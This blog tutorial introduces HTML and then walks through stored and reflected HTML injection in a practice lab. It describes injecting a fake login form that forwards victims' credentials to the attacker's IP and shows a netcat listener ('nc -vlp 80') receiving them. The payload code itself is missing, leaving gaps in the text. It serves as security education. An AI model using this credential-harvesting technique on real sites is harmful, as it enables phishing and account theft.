Beginner Guide to HTML Injection

From W3schools
HTML is the standard Hyper Text Markup Language which use for designing Web pages

·         HTML describes the structure of Web pages using markup.
·         HTML elements are the building blocks of HTML pages.
·         HTML elements are represented by tags.
·         HTML tags label pieces of content such as "heading", "paragraph", "table", and so on.

·         Browsers do not show the HTML tags, but utilize them to submit the content of the page.


HTML Tags
HTML tags are element names surrounded by angle brackets. Their two types of tag starting also known as opening tag and end tag also known as closing tag.


HTML Elements
An HTML element usually consists of a start tag and end tag, with the content inserted in between:


HTML Attributes
Attributes provide additional information about HTML elements. Attributes generally come in form of name/value pairs like: name="value"

Create web page using html

Generally “Notepad” is use for writing HTML code and save the text file with .html/.htm extension for example “test.html” then open the saved file using any web browser.

To create a simple web page type following code inside notepad and save test.html

When you will open test.html in web browser you will see given below image.

HTML injection is the vulnerability inside any website that occurs when the user input is not correctly sanitized and the output is not encoded and attacker is able to inject valid HTML code into a vulnerable web page. There are so many techniques which could be use element and attributes to submit HTML content.

If these methods are provided with an untrusted input, then there is a high risk of XSS, specifically an HTML injection one. If strings are not correctly sanitized the problem could lead to XSS based HTML injection.

This vulnerability can have many consequences, like disclosure of a user's session cookies that could be used to impersonate the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims.


Their two type of html injection as following:

·         Stored HTML
·         Reflected HTML

Stored HTML
A stored HTML also known as Persistence because through this vulnerability the injected malicious script get permanently stored inside the webserver and the application server give out it back to the user when he visits the respective website. Hence when the client will click on payload which appears as an official part of the website, the injected HTML code will get execute by the browser. The most common example is comment option on blogs, which allow the users to POST their comment for administer or other user.

Example:
An example of a web application vulnerable to stored HTML injection which allow users to submit their entry in blog as shown in the screenshot.


Firstly user “raj” had made a normal entry as attacker which is successfully added in web server database.


Enter following html code inside given text area for making HTML attack.  

Above HTML code will generate a payload to create user login page on targeted web page and forward that credential to attacker’s IP.


You can see given below login page look valid to user and get stored inside web server.



Now when victim will open the malicious login page he will receive above web page which looks official to him and he will submit his credential in that page. As he will do so the request will be forward on attacker IP address.


nc -vlp 80
Attacker will receive users credential as response on natcat. From screenshot you can read username=bee & password=bug
Now attacker will use these credential for login.


Reflected HTML

The reflected HTML HTML is also known as Non Persistence is occurs when the web application respond immediately on user’s input without validating the inputs this lead an attacker to injects browser executable code inside the single HTML response. It’s named as “non-persistent” since the malicious script does not get stored inside the web server, therefore attacker will send the malicious link through phishing to trap the user.

The most common applying of this kind of vulnerability is in Search engines in website: the attacker writes some arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page will return the result of these HTML entities.

Example:
Following web page allow user to submit his first and last name but these text field are vulnerable to HTML injection.


Now type following html code in the text field given for first name which create a link for hackingarticles.in when you click on “RAJ”

RAJ


Similarly type following code in given text field for last name:

CHANDEL


Click on Go tab to execute this as first and last name.

From given screenshot you can see it has submitted RAJ CHANDEL and the word “RAJ” contains a link for hackingarticles.in, when you will click on link it will forwarded to hackingarticles.in

0 comments:

Post a Comment